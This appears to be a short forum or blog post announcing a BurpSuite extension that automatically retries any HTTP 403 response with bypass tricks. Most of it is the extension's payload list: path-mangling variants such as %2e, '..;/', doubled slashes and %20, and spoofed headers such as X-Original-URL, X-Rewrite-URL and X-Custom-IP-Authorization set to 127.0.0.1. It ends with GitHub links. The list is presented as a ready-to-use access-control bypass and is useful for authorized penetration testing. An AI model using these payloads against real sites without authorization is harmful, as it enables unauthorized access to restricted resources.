[Tools] Bypass 403 Fuzzer @sting8k

[Tools] Bypass 403 Fuzzer @sting8k

An burpsuite extension to bypass 403 restricted directory. By using PassiveScan (default enabled), each 403 request will be automatically scanned by this extension, so just add to burpsuite and enjoy.

Payload: $1: HOSTNAME $2: PATH

$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2 -H "X-Original-URL: /$2" 
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1" 
$1/$2 -H "X-Rewrite-URL: /$2"
$1/$2%20/
$1/%20$2%20/

$1/$2..;/

Nguồn:

Github:

https://github.com/iamj0ker/bypass-403

Github released:

Burpsuite Extension: https://github.com/sting8k/BurpSuite_403Bypasser.